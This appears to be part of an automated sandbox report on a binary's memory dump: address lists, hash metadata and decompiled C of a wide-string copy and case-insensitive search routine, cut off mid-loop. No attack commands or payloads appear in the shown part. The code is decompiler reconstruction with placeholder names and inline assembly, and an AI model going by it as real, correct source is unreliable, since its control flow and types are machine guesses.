0x003c8b0a
0x003c8b0d
0x003c8b10
0x003c8b12
0x003c8b30
0x003c8b33
0x003c8b33
0x003c8b38
0x003c8b40
0x003c8b40
0x003c8b40
0x003c8b41
0x003c8b4b
0x003c8b55
0x003c8b56
0x003c8b5a
0x003c8b5e
0x003c8b63
0x003c8b67
0x003c8b6b
0x003c8b6f
0x003c8b74
0x003c8b78
0x003c8b7c
0x003c8b81
0x003c8b85
0x003c8b88
0x003c8b8c
0x003c8b98
0x003c8b98
0x003c8b9b
0x003c8b9c
0x003c8b9f
0x003c8ba1
0x00000000
0x00000000
0x003c8ba3
0x003c8ba5
0x003c91b6
0x003c91ba
0x003c91be
0x003c91c2
0x003c91c5
0x003c91c9
0x00000000
0x00000000
0x00000000
0x003c91cd
0x003c91cd
0x003c91d0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c8bab
0x003c8bab
0x003c8bad
0x003c91e5
0x003c91e9
0x003c91ec
0x003c8bb3
0x003c8b92
0x003c8b95
0x003c8b95
0x00000000
0x003c8b95
0x00000000
0x003c8bad
0x003c8b14
0x003c8b14
0x003c8b16
0x003c8b19
0x003c8c29
0x003c8c29
0x003c8c2e
0x003c8c30
0x003c8c33
0x003c8c35
0x00000000
0x00000000
0x00000000
0x00000000
0x003c8b1f
0x003c8b1f
0x003c8bd3
0x003c8bd3
0x003c8bd7
0x003c8bdc
0x003c8be0
0x003c8be4
0x003c8be4
0x003c8be6
0x003c8bf9
0x003c8be8
0x003c8be8
0x003c8bea
0x003c91fe
0x003c9202
0x003c9202
0x003c8bf0
0x003c8bf0
0x003c908a
0x003c908c
0x003c908c
0x003c908f
0x003c90af
0x003c90b3
0x003c90bf
0x003c90bf
0x003c90c5
0x003c90c5
0x003c90ca
0x003c90ce
0x003c90d2
0x003c90d4
0x00000000
0x00000000
0x003c90da
0x003c90dd
0x003c90df
0x00000000
0x003c90e1
0x003c90e1
0x003c90e7
0x00000000
0x00000000
0x00000000
0x00000000
0x003c90e7
0x00000000
0x003c90df
0x003c926c
0x003c9271
0x00000000
0x003c9091
0x003c9091
0x003c9093
0x003c9095
0x003c90e9
0x003c90e9
0x003c90ed
0x003c90ef
0x00000000
0x00000000
0x003c90f5
0x003c90f6
0x003c90fc
0x00000000
0x003c90fe
0x003c90fe
0x003c90fe
0x003c90fe
0x00000000
0x003c90fc
0x00000000
0x003c9097
0x003c909c
0x003c909c
0x003c909e
0x003c909e
0x003c90a2
0x003c90a4
0x00000000
0x00000000
0x003c90aa
0x003c90ab
0x003c90ad
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c90ad
0x003c9259
0x003c9259
0x003c925c
0x003c9264
0x003c9264
0x003c925c
0x003c9095
0x003c908f
0x003c9103
0x003c9108
0x003c9108
0x003c910b
0x003c910e
0x003c9111
0x003c9115
0x003c9125
0x003c9128
0x003c9128
0x003c912e
0x003c9136
0x003c9136
0x003c9136
0x003c9139
0x003c913e
0x003c9148
0x003c914c
0x003c9152
0x003c9154
0x003c9157
0x003c9159
0x003c919b
0x003c919d
0x003c915b
0x003c915b
0x003c915d
0x003c915f
0x003c9162
0x003c9165
0x003c9167
0x003c9169
0x003c9169
0x003c916b
0x003c916b
0x003c916c
0x003c9171
0x003c9176
0x003c9178
0x00000000
0x00000000
0x003c917a
0x003c917e
0x003c9182
0x003c9184
0x00000000
0x00000000
0x00000000
0x003c9184
0x003c916b
0x003c9167
0x003c9186
0x003c9186
0x003c9188
0x003c9189
0x003c918d
0x003c9192
0x003c9196
0x003c9196
0x003c91a0
0x003c91a0
0x003c91a8
0x003c91ac
0x003c8bfd
0x003c8bfd
0x003c8bfd
0x003c8c04
0x003c8c07
0x003c8c09
0x003c8c0b
0x00000000
0x00000000
0x003c8c14
0x003c8c16
0x003c8e0d
0x003c8e0f
0x00000000
0x003c8e15
0x003c8e17
0x003c8e17
0x003c8e1a
0x003c8e36
0x003c8e3a
0x003c8e46
0x003c8e46
0x003c8e4c
0x003c8e4c
0x003c8e51
0x003c8e55
0x003c8e59
0x003c8e5b
0x00000000
0x00000000
0x003c8e61
0x003c8e64
0x003c8e66
0x00000000
0x003c8e68
0x003c8e68
0x003c8e6e
0x00000000
0x00000000
0x00000000
0x00000000
0x003c8e6e
0x00000000
0x003c8e66
0x003c928e
0x003c9293
0x003c8e1c
0x003c8e1c
0x003c8e1e
0x003c8e20
0x003c8e70
0x003c8e70
0x003c8e74
0x003c8e76
0x00000000
0x00000000
0x003c8e78
0x003c8e79
0x003c8e7f
0x00000000
0x003c8e81
0x003c8e81
0x003c8e81
0x003c8e81
0x00000000
0x003c8e7f
0x003c8e22
0x003c8e27
0x003c8e27
0x003c8e29
0x003c8e29
0x003c8e2d
0x003c8e2f
0x00000000
0x00000000
0x003c8e31
0x003c8e32
0x003c8e34
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c8e34
0x003c8e29
0x003c8e20
0x003c8e86
0x003c8e86
0x003c8e88
0x003c9287
0x003c8e8e
0x003c8e90
0x003c8e90
0x003c8e93
0x003c8ebc
0x003c8ec0
0x003c8ecc
0x003c8ed0
0x003c8ed0
0x003c8ed5
0x003c8ed5
0x003c8eda
0x003c8ede
0x003c8ee2
0x003c8ee4
0x00000000
0x00000000
0x003c8eea
0x003c8eed
0x003c8eef
0x00000000
0x003c8ef1
0x003c8ef1
0x003c8ef5
0x003c8efa
0x00000000
0x00000000
0x00000000
0x00000000
0x003c8efa
0x00000000
0x003c8eef
0x003c9277
0x003c927a
0x003c927c
0x003c9280
0x003c8e95
0x003c8e95
0x003c8e97
0x003c8e9a
0x003c8efc
0x003c8efc
0x003c8f00
0x003c8f02
0x00000000
0x00000000
0x003c8f04
0x003c8f05
0x003c8f0a
0x00000000
0x003c8f0c
0x003c8f0c
0x003c8f0c
0x003c8f0c
0x00000000
0x003c8f0a
0x003c8e9c
0x003c8ea1
0x003c8ea1
0x003c8ea3
0x003c8ea7
0x003c8eab
0x003c8ead
0x00000000
0x00000000
0x003c8eb3
0x003c8eb4
0x003c8eb6
0x00000000
0x003c8eb8
0x003c8eb8
0x00000000
0x003c8eb8
0x00000000
0x003c8eb6
0x003c9220
0x003c9220
0x003c8e9a
0x003c8e93
0x003c8f11
0x003c8f11
0x003c8f11
0x003c8f15
0x003c8f17
0x003c8f40
0x003c8f43
0x003c8f46
0x003c8f4a
0x00000000
0x00000000
0x00000000
0x003c8f19
0x003c8f19
0x003c8f1b
0x003c9229
0x003c922e
0x00000000
0x00000000
0x00000000
0x00000000
0x003c8f21
0x003c8f21
0x003c8f23
0x003c8f26
0x003c8f2b
0x003c8f34
0x003c8f34
0x003c8f50
0x003c8f5a
0x003c8f5d
0x003c8f5d
0x003c8f62
0x003c8f6a
0x003c8f6a
0x003c8f6a
0x003c8f6b
0x003c8f75
0x003c8f7f
0x003c8f83
0x003c8f84
0x003c8f88
0x003c8f8d
0x003c8f91
0x003c8f93
0x003c8f96
0x003c8f98
0x003c8fea
0x003c8fec
0x003c8f9a
0x003c8f9a
0x003c8f9c
0x003c8f9e
0x003c8fa1
0x003c8fa4
0x003c8fa6
0x003c8fa8
0x003c8fac
0x003c8fac
0x003c8fae
0x003c8fae
0x003c8faf
0x003c8fb4
0x003c8fb9
0x003c8fbb
0x00000000
0x00000000
0x003c8fbd
0x003c8fc1
0x003c8fc5
0x003c8fc7
0x00000000
0x00000000
0x00000000
0x003c8fc7
0x003c8fc9
0x003c8fc9
0x003c8fa6
0x003c8fcd
0x003c8fcf
0x003c8fd0
0x003c8fd4
0x003c8fd8
0x003c8fdd
0x003c8fe1
0x003c8fe5
0x003c8fe5
0x003c8fef
0x003c8ff1
0x003c8ff1
0x003c8ff3
0x003c8ff5
0x003c9234
0x003c9238
0x003c9239
0x003c923b
0x003c924a
0x003c924f
0x003c9251
0x00000000
0x003c923d
0x003c9241
0x003c9243
0x00000000
0x003c9245
0x00000000
0x003c9245
0x00000000
0x003c9243
0x003c8ffb
0x003c8ffb
0x00000000
0x003c8ffb
0x003c8f2d
0x003c8f2d
0x003c8ffe
0x003c8ffe
0x003c9000
0x003c9002
0x003c9006
0x003c9006
0x003c9008
0x003c900c
0x003c900c
0x003c900d
0x003c9014
0x003c9017
0x003c9019
0x00000000
0x00000000
0x003c901e
0x003c9020
0x003c9022
0x00000000
0x00000000
0x00000000
0x003c9022
0x003c9024
0x003c9028
0x003c9028
0x003c902c
0x003c902e
0x003c9030
0x003c9039
0x00000000
0x00000000
0x003c9032
0x003c9032
0x003c903b
0x003c903b
0x003c9043
0x003c9047
0x003c904b
0x003c904f
0x003c904f
0x003c9053
0x003c9057
0x003c9059
0x00000000
0x00000000
0x003c905b
0x003c905b
0x003c905f
0x003c9060
0x003c9062
0x00000000
0x00000000
0x00000000
0x003c9062
0x003c9064
0x003c9068
0x003c9068
0x003c906c
0x003c906e
0x003c906f
0x003c9076
0x003c9078
0x003c91d6
0x003c91d6
0x003c91db
0x003c91dd
0x003c8c3b
0x003c8c3b
0x003c8c3e
0x003c8c40
0x003c8d95
0x003c8d95
0x003c8d9f
0x003c8da1
0x003c8da7
0x003c8da9
0x003c8dab
0x003c8de5
0x003c8de7
0x003c8dad
0x003c8dad
0x003c8daf
0x003c8db1
0x003c8db4
0x003c8db7
0x003c8db9
0x003c8dbb
0x003c8dbb
0x003c8dbd
0x003c8dbd
0x003c8dbe
0x003c8dc3
0x003c8dc8
0x003c8dca
0x00000000
0x00000000
0x003c8dcc
0x003c8dd0
0x003c8dd4
0x003c8dd6
0x00000000
0x00000000
0x00000000
0x003c8dd6
0x003c8dbd
0x003c8db9
0x003c8dd8
0x003c8dd8
0x003c8dda
0x003c8ddb
0x003c8de0
0x003c8de0
0x003c8dea
0x003c8ded
0x003c8def
0x003c8c46
0x003c8c48
0x003c8c48
0x003c8c4b
0x003c8c68
0x003c8c6c
0x003c8c78
0x003c8c78
0x003c8c7e
0x003c8c7e
0x003c8c83
0x003c8c87
0x003c8c8b
0x003c8c8d
0x00000000
0x00000000
0x003c8c93
0x003c8c96
0x003c8c98
0x00000000
0x003c8c9a
0x003c8c9a
0x003c8ca0
0x00000000
0x00000000
0x00000000
0x00000000
0x003c8ca0
0x00000000
0x003c8c98
0x003c9214
0x003c9219
0x003c8c4d
0x003c8c4d
0x003c8c4f
0x003c8c52
0x003c8ca2
0x003c8ca2
0x003c8ca6
0x003c8ca8
0x00000000
0x00000000
0x003c8caa
0x003c8cab
0x003c8cb1
0x00000000
0x003c8cb3
0x003c8cb3
0x003c8cb3
0x003c8cb3
0x00000000
0x003c8cb1
0x003c8c54
0x003c8c59
0x003c8c59
0x003c8c5b
0x003c8c5b
0x003c8c5f
0x003c8c61
0x00000000
0x00000000
0x003c8c63
0x003c8c64
0x003c8c66
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c8c66
0x003c8c5b
0x003c8c52
0x003c8cb8
0x003c8cbd
0x003c8cbd
0x003c8cc0
0x003c8cc3
0x003c8cc6
0x003c8cc8
0x003c8cdb
0x003c8cde
0x003c8cde
0x003c8ce4
0x003c8cec
0x003c8cec
0x003c8cec
0x003c8ced
0x003c8cf7
0x003c8cfe
0x003c8cff
0x003c8d02
0x003c8d07
0x003c8d0d
0x003c8d0f
0x003c8d11
0x003c8d5b
0x003c8d5d
0x003c8d13
0x003c8d13
0x003c8d15
0x003c8d17
0x003c8d1a
0x003c8d1d
0x003c8d1f
0x003c8d21
0x003c8d25
0x003c8d25
0x003c8d27
0x003c8d27
0x003c8d28
0x003c8d2d
0x003c8d32
0x003c8d34
0x00000000
0x00000000
0x003c8d36
0x003c8d3a
0x003c8d3e
0x003c8d40
0x00000000
0x00000000
0x00000000
0x003c8d40
0x003c8d42
0x003c8d42
0x003c8d1f
0x003c8d46
0x003c8d48
0x003c8d49
0x003c8d4d
0x003c8d52
0x003c8d56
0x003c8d56
0x003c8d60
0x003c8d63
0x003c8d66
0x003c8cca
0x003c8cca
0x003c8cca
0x003c8d68
0x003c8d6a
0x003c8d6c
0x003c8d72
0x003c8d7c
0x003c8d7c
0x003c8d7f
0x003c8d80
0x003c8d83
0x003c8d85
0x00000000
0x00000000
0x003c8d87
0x003c8d89
0x003c920b
0x00000000
0x00000000
0x00000000
0x00000000
0x003c8d8f
0x003c8d8f
0x003c8d91
0x003c8d76
0x003c8d79
0x003c8d79
0x00000000
0x003c8d79
0x00000000
0x003c8d91
0x003c8d7c
0x003c8d6c
0x003c907e
0x003c9082
0x003c9084
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c9084
0x003c9078
0x003c8f2b
0x003c8f1b
0x003c8f17
0x003c8c1c
0x003c8c1c
0x003c8c1c
0x003c8c20
0x00000000
0x003c8c20
0x00000000
0x003c8c16
0x003c929a
0x003c929c
0x00000000
0x003c929c
0x00000000
0x003c8c24
0x003c8c24
0x003c8c25
0x003c8c25
0x00000000
0x003c8be4
0x003c8b19
0x003c8b12
0x003c8a8b
0x003c8df6
0x003c8df6
0x003c8df8
0x003c8df9
0x003c8e0a
0x003c8a04
0x003c8a04
0x003c8a07
0x003c8a09
0x003c8a0e
0x003c8a10
0x003c8a18
0x003c8a1a
0x003c8a20
0x003c8a24
0x003c8a5c
0x003c8a26
0x003c8a28
0x003c8a2a
0x003c8a2d
0x003c8a32
0x003c8a34
0x003c8a34
0x003c8a35
0x003c8a3a
0x003c8a41
0x00000000
0x00000000
0x003c8a43
0x003c8a47
0x003c8a4d
0x00000000
0x00000000
0x00000000
0x003c8a4d
0x003c8a34
0x003c8a32
0x003c8a4f
0x003c8a4f
0x003c8a51
0x003c8a52
0x003c8a57
0x003c8a57
0x003c8a5f
0x003c8a62
0x003c8a69
0x003c8a74
0x003c8a74
0x00000000

Strings

@, xrefs: 003C9229

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 890d090df5082a30348e5f74619d74015760cc1c72b8607f5a6b626b3c49c3ad
Instruction ID: 3e6d441367bead85f5bd3f9103669889a88506369384a4624508dafbf57d80bb
Opcode Fuzzy Hash: 890d090df5082a30348e5f74619d74015760cc1c72b8607f5a6b626b3c49c3ad
Instruction Fuzzy Hash: F34208716147128BD7268F29C891B3A73E6AFD4350F1A862EE896CB290EF35CD41C391

Uniqueness

Uniqueness Score: -1.00%

Function 003BAE80, Relevance: 2.0, Strings: 1, Instructions: 719
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E003BAE80(intOrPtr* __ecx, void* __eflags, signed int* _a4, signed int _a8) {
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* __esi;
				signed short* _t229;
				unsigned int _t237;
				signed int _t238;
				signed short** _t243;
				signed short* _t244;
				signed short* _t248;
				signed int* _t250;
				signed int _t255;
				signed int _t259;
				signed int _t264;
				signed int _t268;
				signed int _t271;
				unsigned int _t277;
				signed int _t278;
				void* _t284;
				signed int _t287;
				signed int _t288;
				signed int _t291;
				signed short* _t298;
				signed int _t301;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t316;
				signed int _t317;
				signed int _t319;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed short* _t334;
				signed int _t336;
				signed int _t337;
				signed int _t339;
				signed int _t346;
				signed int _t349;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t359;
				signed int _t360;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t368;
				signed int _t374;
				signed int _t377;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				void* _t385;
				signed int _t386;
				signed int _t387;
				signed int _t390;
				intOrPtr* _t392;
				signed int _t393;
				signed int _t394;
				intOrPtr* _t396;
				signed int _t397;
				signed int _t398;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				intOrPtr* _t403;
				signed int _t404;
				signed int _t405;
				void* _t406;
				signed int _t407;
				signed int _t408;
				signed short* _t411;
				signed int* _t412;
				signed int _t413;
				signed int _t417;
				intOrPtr* _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t441;
				signed int _t443;
				signed int _t448;
				signed int _t449;
				signed int _t452;
				signed int _t455;
				intOrPtr* _t458;
				signed int _t460;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				unsigned int _t465;
				unsigned int _t466;
				signed int _t467;
				unsigned int _t470;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				signed int _t478;
				void* _t481;

				_v64 = 0;
				_t458 = __ecx;
				_v60 = 0;
				_push(0x80);
				_t441 = E003B1030();
				_t481 = (_t478 & 0xfffffff0) - 0x34 + 4;
				_t229 = _v64;
				if(_t229 == 0) {
					__eflags = 0;
					 *_t441 = 0;
				} else {
					if(_t441 != 0) {
						_t384 =  *_t229 & 0x0000ffff;
						 *_t441 = _t384;
						if(_t384 != 0) {
							while(1) {
								_t384 = 1;
								_t382 = _t229[1] & 0x0000ffff;
								 *(_t441 + 2) = _t382;
								if(_t382 == 0) {
									goto L6;
								}
								_t383 = _t229[2] & 0x0000ffff;
								 *(_t441 + 4) = _t383;
								if(_t383 != 0) {
									continue;
								}
								goto L6;
							}
						}
					}
					L6:
					_push(2);
					_push(_t229);
					E003B10B0();
					_t481 = _t481 + 8;
				}
				_v60 = 0x40;
				_v64 = _t441;
				if((_a8 & 0x0000ffff) != 0) {
					__eflags = _t441;
					if(_t441 == 0) {
						_t349 = 0x40;
						_t316 = 0;
					} else {
						_t309 = _t441 & 0x0000000f;
						__eflags = _t309;
						if(_t309 == 0) {
							L16:
							asm("pxor xmm0, xmm0");
							_t346 =  ~( ~_t309 + 0x00000007 & 0x00000007) + 0x7fffffff;
							__eflags = _t346;
							while(1) {
								asm("movdqu xmm1, [edi+eax*2]");
								asm("pcmpeqw xmm1, xmm0");
								asm("pmovmskb edx, xmm1");
								__eflags = _t384;
								if(_t384 != 0) {
									break;
								}
								_t309 = _t309 + 8;
								__eflags = _t309 - _t346;
								if(_t309 < _t346) {
									continue;
								} else {
									__eflags = _t346 - 0x7fffffff;
									if(_t346 >= 0x7fffffff) {
										goto L22;
									} else {
										goto L20;
									}
								}
								goto L23;
							}
							asm("bsf ebx, edx");
							_t316 = (_t346 >> 1) + _t309;
							goto L126;
						} else {
							_t346 = 0;
							__eflags = _t309 & 0x00000001;
							if((_t309 & 0x00000001) != 0) {
								while(1) {
									L20:
									__eflags =  *(_t441 + _t346 * 2) & 0x0000ffff;
									if(( *(_t441 + _t346 * 2) & 0x0000ffff) == 0) {
										goto L126;
									}
									_t346 = _t346 + 1;
									__eflags = _t346 - 0x7fffffff;
									if(_t346 < 0x7fffffff) {
										continue;
									} else {
										L22:
										_t349 = 0x40;
										_t316 = 0x7fffffff;
									}
									goto L23;
								}
								goto L126;
							} else {
								_t309 =  ~_t309 + 0x10 >> 1;
								__eflags = _t309;
								while(1) {
									_t384 =  *(_t441 + _t346 * 2) & 0x0000ffff;
									__eflags = _t384;
									if(_t384 == 0) {
										break;
									}
									_t346 = _t346 + 1;
									__eflags = _t346 - _t309;
									if(_t346 < _t309) {
										continue;
									} else {
										goto L16;
									}
									goto L23;
								}
								L126:
								__eflags = _t316 - 0xfffffffe;
								if(_t316 != 0xfffffffe) {
									_t349 = 0x40;
								} else {
									 *_t441 = 0;
									_t349 = _v60;
								}
							}
						}
					}
					L23:
					_t24 = _t316 + 2; // -2147483652
					_t385 = _t24;
					__eflags = _t385 - 0x40;
					_t386 =  <=  ? 0x40 : _t385;
					__eflags = _t349 - _t386;
					if(_t349 < _t386) {
						_t237 = (_t386 >> 5 >> 0x1a) + _t386 >> 6;
						_t387 = _t386 & 0x8000003f;
						__eflags = _t387;
						if(_t387 < 0) {
							_t387 = (_t387 - 0x00000001 | 0xffffffc0) + 1;
							__eflags = _t387;
						}
						__eflags = _t387;
						_t238 = _t237 + (0 | _t387 > 0x00000000);
						_push(_t238 << 7);
						_t443 = _t238 << 6;
						_t390 = E003B1030();
						_t481 = _t481 + 4;
						_t350 = _v64;
						__eflags = _t350;
						if(_t350 == 0) {
							__eflags = 0;
							 *_t390 = 0;
						} else {
							__eflags = _t390;
							if(_t390 != 0) {
								_t306 =  *_t350 & 0x0000ffff;
								 *_t390 = _t306;
								__eflags = _t306;
								if(_t306 != 0) {
									_v68 = _t458;
									_t307 = 0;
									__eflags = 0;
									while(1) {
										_t307 = _t307 + 1;
										_t476 =  *(_t350 + _t307 * 4 - 2) & 0x0000ffff;
										 *(_t390 + _t307 * 4 - 2) = _t476;
										__eflags = _t476;
										if(_t476 == 0) {
											break;
										}
										_t477 =  *(_t350 + _t307 * 4) & 0x0000ffff;
										 *(_t390 + _t307 * 4) = _t477;
										__eflags = _t477;
										if(_t477 != 0) {
											continue;
										}
										break;
									}
									_t458 = _v68;
								}
							}
							_push(2);
							_push(_t350);
							_v68 = _t390;
							E003B10B0();
							_t390 = _v68;
							_t481 = _t481 + 8;
						}
						_v60 = _t443;
						_v64 = _t390;
					} else {
						_t390 = _v64;
					}
					 *((short*)(_t390 + _t316 * 2)) = _a8 & 0x0000ffff;
					__eflags = 0;
					_t243 =  &_v64;
					 *((short*)(_v64 + 2 + _t316 * 2)) = 0;
				} else {
					_t243 =  &_v64;
				}
				_t244 =  *_t243;
				_v28 = _t244;
				if(_t244 == 0) {
					L40:
					_t392 = _a4;
					_push(0x80);
					 *_t392 = 0;
					 *((intOrPtr*)(_t392 + 4)) = 0;
					_t317 = E003B1030();
					_t481 = _t481 + 4;
					_t248 =  *_a4;
					if(_t248 == 0) {
						 *_t317 = 0;
					} else {
						if(_t317 != 0) {
							_t393 =  *_t248 & 0x0000ffff;
							 *_t317 = _t393;
							if(_t393 != 0) {
								_t394 = 0;
								while(1) {
									_t394 = _t394 + 1;
									_t352 =  *(_t248 + _t394 * 4 - 2) & 0x0000ffff;
									 *(_t317 + _t394 * 4 - 2) = _t352;
									if(_t352 == 0) {
										goto L46;
									}
									_t353 =  *(_t248 + _t394 * 4) & 0x0000ffff;
									 *(_t317 + _t394 * 4) = _t353;
									if(_t353 != 0) {
										continue;
									}
									goto L46;
								}
							}
						}
						L46:
						_push(2);
						_push(_t248);
						E003B10B0();
						_t481 = _t481 + 8;
					}
					goto L124;
				} else {
					_t319 =  *_t244 & 0x0000ffff;
					if(_t319 != 0) {
						_t460 =  *_t458;
						_t255 = E003BFB60(_t460, _t244, _t460);
						__eflags = _t255;
						if(_t255 == 0) {
							_t396 = _a4;
							_push(0x80);
							 *_t396 = 0;
							 *((intOrPtr*)(_t396 + 4)) = 0;
							_t317 = E003B1030();
							_t481 = _t481 + 4;
							_t259 =  *_a4;
							__eflags = _t259;
							if(_t259 == 0) {
								 *_t317 = 0;
							} else {
								__eflags = _t317;
								if(_t317 != 0) {
									_t397 =  *_t259 & 0x0000ffff;
									 *_t317 = _t397;
									__eflags = _t397;
									if(_t397 != 0) {
										_t398 = 0;
										__eflags = 0;
										while(1) {
											_t398 = _t398 + 1;
											_t355 =  *(_t259 + _t398 * 4 - 2) & 0x0000ffff;
											 *(_t317 + _t398 * 4 - 2) = _t355;
											__eflags = _t355;
											if(_t355 == 0) {
												goto L176;
											}
											_t356 =  *(_t259 + _t398 * 4) & 0x0000ffff;
											 *(_t317 + _t398 * 4) = _t356;
											__eflags = _t356;
											if(_t356 != 0) {
												continue;
											}
											goto L176;
										}
									}
								}
								L176:
								_push(2);
								_push(_t259);
								E003B10B0();
								_t481 = _t481 + 8;
							}
							goto L124;
						} else {
							_t66 = _t319 - 0x41; // 0x7fffffbe
							__eflags = _t66 - 0x19;
							_t67 = _t319 + 0x20; // 0x8000001f
							_v40 = _t460;
							_t320 =  <=  ? _t67 : _t319;
							_t400 = _v28 & 0x0000000f;
							_t358 = ( <=  ? _t67 : _t319) & 0x0000ffff;
							asm("pxor xmm0, xmm0");
							_v36 =  ~_t400 + 0x10 >> 1;
							_v32 = _t400 & 0x00000001;
							_t448 = 0;
							__eflags = 0;
							_v44 = ( <=  ? _t67 : _t319) & 0x0000ffff;
							while(1) {
								L50:
								_t325 = _t255;
								_t462 = _t255 + 2;
								__eflags = _t462;
								if(_t462 == 0) {
									break;
								}
								__eflags =  *(_t255 + 2) & 0x0000ffff;
								if(( *(_t255 + 2) & 0x0000ffff) == 0) {
									break;
								} else {
									_v52 = _t400;
									_t368 = _t448;
									_v68 = _t325;
									while(1) {
										_t368 = _t368 + 1;
										_t334 = _t255 + _t368 * 2;
										_t429 =  *_t334 & 0x0000ffff;
										__eflags = ( *(_t462 + _t368 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
										_v48 = _t334;
										_t448 = _v44;
										_t430 =  <=  ? _t429 + 0x20 : _t429;
										__eflags = ( <=  ? _t429 + 0x20 : _t429) - _t448;
										if(( <=  ? _t429 + 0x20 : _t429) == _t448) {
											break;
										}
										__eflags =  *(_t462 + _t368 * 2) & 0x0000ffff;
										if(( *(_t462 + _t368 * 2) & 0x0000ffff) != 0) {
											continue;
										} else {
											L55:
											_t325 = _v68;
											_t463 = _v40;
										}
										goto L56;
									}
									_t400 = _v52;
									_t301 = _v48;
									_t452 = _v36;
									_t465 = _v32;
									while(1) {
										_t336 = _t400;
										__eflags = _t400;
										if(_t400 == 0) {
											goto L141;
										}
										L136:
										_t377 = 0;
										__eflags = _t465;
										if(_t465 != 0) {
											L145:
											_v32 = _t465;
											_t474 = _v28;
											while(1) {
												__eflags =  *(_t474 + _t377 * 2) & 0x0000ffff;
												if(( *(_t474 + _t377 * 2) & 0x0000ffff) == 0) {
													break;
												}
												_t377 = _t377 + 1;
												__eflags = _t377 - 0x7fffffff;
												if(_t377 < 0x7fffffff) {
													continue;
												} else {
													_t466 = _v32;
													goto L149;
												}
												goto L180;
											}
											_t466 = _v32;
											goto L159;
										} else {
											_v32 = _t465;
											_t336 = _t452;
											_v24 = _t301;
											_t475 = _v28;
											while(1) {
												__eflags =  *(_t475 + _t377 * 2) & 0x0000ffff;
												if(( *(_t475 + _t377 * 2) & 0x0000ffff) == 0) {
													break;
												}
												_t377 = _t377 + 1;
												__eflags = _t377 - _t452;
												if(_t377 < _t452) {
													continue;
												} else {
													_t301 = _v24;
													_t465 = _v32;
													goto L141;
												}
												goto L180;
											}
											_t301 = _v24;
											_t466 = _v32;
											L159:
											__eflags = _t377;
											if(__eflags == 0) {
												L149:
												_t377 = 0x7fffffff;
												goto L150;
											} else {
												if(__eflags > 0) {
													L150:
													_v56 = _t377;
													_t337 = 0;
													__eflags = 0;
													_v52 = _t400;
													_v36 = _t452;
													_v32 = _t466;
													while(1) {
														_t467 =  *(_t301 + _t337 * 2) & 0x0000ffff;
														_t455 =  *(_v28 + _t337 * 2) & 0x0000ffff;
														__eflags = _t467 - 0x61 - 0x19;
														_t468 =  <=  ? _t467 - 0x20 : _t467;
														_t432 = ( <=  ? _t467 - 0x20 : _t467) & 0x0000ffff;
														__eflags = _t455 - 0x61 - 0x19;
														_t456 =  <=  ? _t455 - 0x20 : _t455;
														__eflags = _t432 - ( <=  ? _t455 - 0x20 : _t455);
														if(__eflags < 0 || __eflags > 0) {
															break;
														}
														__eflags = _t432;
														if(_t432 == 0) {
															L155:
															_t400 = _v52;
															_t448 = 0;
															__eflags = 0;
															_t325 = _v68;
															goto L156;
														} else {
															_t337 = _t337 + 1;
															__eflags = _t337 - _v56;
															if(_t337 < _v56) {
																continue;
															} else {
																goto L155;
															}
														}
														goto L180;
													}
													_t433 = _v52;
													_t448 = _v36;
													_t470 = _v32;
													_t339 = _t301 + 2;
													__eflags = _t339;
													if(_t339 == 0) {
														goto L55;
													} else {
														__eflags =  *(_t301 + 2) & 0x0000ffff;
														if(( *(_t301 + 2) & 0x0000ffff) == 0) {
															goto L55;
														} else {
															_v52 = _t433;
															_t381 = 0;
															__eflags = 0;
															_v24 = _t301;
															_v36 = _t448;
															_v32 = _t470;
															while(1) {
																_t381 = _t381 + 1;
																_t301 = _v24 + _t381 * 2;
																_t434 =  *_t301 & 0x0000ffff;
																__eflags = ( *(_t339 + _t381 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
																_t448 = _t434 + 0x20;
																_t435 =  <=  ? _t448 : _t434;
																__eflags = ( <=  ? _t448 : _t434) - _v44;
																if(( <=  ? _t448 : _t434) == _v44) {
																	break;
																}
																__eflags =  *(_t339 + _t381 * 2) & 0x0000ffff;
																if(( *(_t339 + _t381 * 2) & 0x0000ffff) != 0) {
																	continue;
																} else {
																	goto L55;
																}
																goto L180;
															}
															_t400 = _v52;
															_t452 = _v36;
															_t465 = _v32;
															_t336 = _t400;
															__eflags = _t400;
															if(_t400 == 0) {
																goto L141;
															}
														}
													}
												} else {
													_v36 = _t452;
													_t448 = 0;
													_v32 = _t466;
													_t325 = _v68;
													L156:
													__eflags = _t301;
													if(_t301 != 0) {
														goto L50;
													} else {
														goto L157;
													}
												}
											}
										}
										L180:
										L141:
										_v36 = _t452;
										_t374 =  ~( ~_t336 + 0x00000007 & 0x00000007) + 0x7fffffff;
										__eflags = _t374;
										_v32 = _t465;
										while(1) {
											asm("movdqu xmm1, [edi+ebx*2]");
											asm("pcmpeqw xmm1, xmm0");
											asm("pmovmskb esi, xmm1");
											__eflags = _t465;
											if(_t465 != 0) {
												break;
											}
											_t336 = _t336 + 8;
											__eflags = _t336 - _t374;
											if(_t336 < _t374) {
												continue;
											} else {
												_t452 = _v36;
												_t466 = _v32;
												__eflags = _t374 - 0x7fffffff;
